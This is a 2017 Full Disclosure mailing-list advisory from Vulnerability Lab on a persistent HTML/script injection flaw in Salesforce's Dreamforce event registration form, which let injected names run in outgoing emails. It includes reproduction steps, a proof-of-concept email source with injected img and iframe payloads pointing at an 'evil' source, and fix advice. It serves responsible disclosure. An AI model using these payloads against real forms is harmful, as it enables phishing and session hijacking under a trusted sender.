[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Salesforce (Event Registration) - Persistent Vulnerability

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] Salesforce (Event Registration) - Persistent Vulnerability
From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
Date: Mon, 16 Jan 2017 10:45:06 +0100
Document Title:
===============
Salesforce (Event Registration) - Persistent Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1991


Release Date:
=============
2017-01-11


Vulnerability Laboratory ID (VL-ID):
====================================
1991


Common Vulnerability Scoring System:
====================================
3.8


Product & Service Introduction:
===============================
Salesforce.com is an American cloud computing company headquartered in San 
Francisco, California. 
Though its revenue comes from a customer relationship management (CRM) product, 
Salesforce also 
capitalizes on commercial applications of social networking through 
acquisition. As of early 2016, 
it is one of the most highly valued American cloud computing companies with a 
market capitalization 
above $55 billion, although the company has never turned a GAAP profit in any 
fiscal year since its 
inception in 1999.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Salesforce.com )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side 
input validation vulnerability and 
mail encode issue in the official Salesforce online service web-application.


Vulnerability Disclosure Timeline:
==================================
2016-10-25: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2016-10-26: Vendor Notification (Salesforce Bug Bounty Program - Security Team)
2017-01-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
SalesForce
Product: Dreamforce - Online Service (Web-Application) 2016 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent vulnerability and mail encode issue has been discovered in the 
official Salesforce Dreamforce web-application.
The security vulnerability allows remote attackers to inject own malicious 
script code to the application-side of the service.

The vulnerability is a persistent input validation and mail encode 
vulnerability. The issue is located in the registration 
website formular POST method request with the firstname and lastname input 
credentials. Remote attackers are able to inject 
own malicious script code during the registration to send the manipulated 
emails to any random target email by the original 
salesforce sender. The vulnerable input is located in the registration formular 
for the dreamforce event and the execution 
point occurs in the outgoing email with application-side effect.

The security risk of the persistent vulnerability is estimated as medium with a 
cvss (common vulnerability scoring system) count of 3.8. 
Exploitation of the application-side vulnerability requires no privileged 
web-application user account and only low user interaction. 
Successful exploitation of the vulnerability results in persistent phishing 
attacks, session hijacking, persistent external redirect 
to malicious sources and persistent manipulation of affected or connected web 
module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] registration

Vulnerable Parameter(s):
[+] name


Proof of Concept (PoC):
=======================
The input validation vulnerability and mail encode vulnerability can be 
exploited by remote attackers 
without user interaction or privileged web-application user account. For 
security demonstration or to 
reproduce the vulnerability follow the provided information and steps below to 
continue.


Manual steps to reproduce the vulnerability ...
1. Open the dreamforce registration formular website
2. Inject a payload to the firstname and lastname input fields
3. Process to submit the form via POST method request
4. Watch the target inbox
5. The payload executes in the mail header next to the introduction with the 
name parameter output
6. Successful reproduce of the vulnerability!


PoC: Exploitation (Remote) Email Source
<tr><td style="padding:0px; margin:0px;border-collapse: collapse;" 
valign="bottom" bgcolor="#ffffff" align="left">
<span style="color: #515151; font-family:'SalesforceSansRegular', Proxima Nova, 
Helvetica, Arial!important; 
left-align:left; font-size: 16px; font-weight: normal; line-height: 24px;" 
class="bodycopycenter">
Sehr geehrter Herr  &gt;&lt; <img src="evil.source">%20%20&gt; <iframe 
src="evil-source">%20<iframe>,<br><br>
in wenigen Wochen ist es so weit und wir bringen die Highlights der Dreamforce, 
der weltweit grÃ¶ÃŸten Cloud-Konferenz, 
mit unserer Roadshow â€ž<a title="Dreamforce to You" target="_blank" 
style="font-family:'SalesforceSansRegular', 
Proxima Nova, Helvetica, Arial!important; font-size: 16px; font-weight:normal; 
color: #00a1e0; text-decoration: none;" 
class="bodycopy" 
href="http://click.mail.salesforce.com/?qs=60d8bb93cf175fdb967e8b36e59930593afcfd89f2783ae662667200051dcb078bd8a62778534cf6";>
<strong>Dreamforce to You</strong></a>" von San Francisco zu Ihnen.   
<br><br>Wir laden Sie herzlich dazu ein, an diesem kostenfreien Event 
teilzunehmen und sich hier fÃ¼r ein Event in Ihrer NÃ¤he zu registrieren.<br>
</span></td></tr>
<tr><td height="30" align="left" valign="top" bgcolor="#ffffff" 
style="padding:0px; margin:0px;border-collapse: 
collapse; font-size:30px; line-height:30px;">&nbsp;
</td></tr></table>
</td></tr></table>


Reference(s):
https://www.salesforce.com/
https://www.salesforce.com/de/
https://www.salesforce.com/de/events/
https://www.salesforce.com/de/events/details/
https://www.salesforce.com/de/events/details/dreamforce2u/


Solution - Fix & Patch:
=======================
Parse the name output in the outgoing email through the web-server when 
processing to notify users in any way. 
Restrict the input field by disallowing the usage of special chars during the 
registration process of the dreamforce events. 
Encode and parse all input context to finally prevent the vulnerability. Watch 
for other implemented event registration 
formulars to ensure that the new issue is not implemented to further projects.


Security Risk:
==============
The security risk of the input validation vulnerability and mail encode issue 
in the salesforce web-application is estimated as medium. (CVSS 3.8)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
                                - www.evolution-sec.com
Section:    magazine.vulnerability-lab.com      - 
vulnerability-lab.com/contact.php                             - 
evolution-sec.com/contact
Social:     twitter.com/vuln_lab                - facebook.com/VulnerabilityLab 
                                - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php                    - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - 
vulnerability-lab.com/list-of-bug-bounty-programs.php         - 
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get a ask permission.

                                    Copyright © 2017 | Vulnerability Laboratory 
- [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Prev by Date: [FD] Huawei Flybox B660 - (POST SMS) CSRF Web Vulnerability
Next by Date: [FD] Apple (iTunes Notify) - Filter Bypass & Persistent Web Vulnerability
Previous by thread: [FD] Huawei Flybox B660 - (POST SMS) CSRF Web Vulnerability
Next by thread: [FD] Apple (iTunes Notify) - Filter Bypass & Persistent Web Vulnerability
Index(es):
- Date
- Thread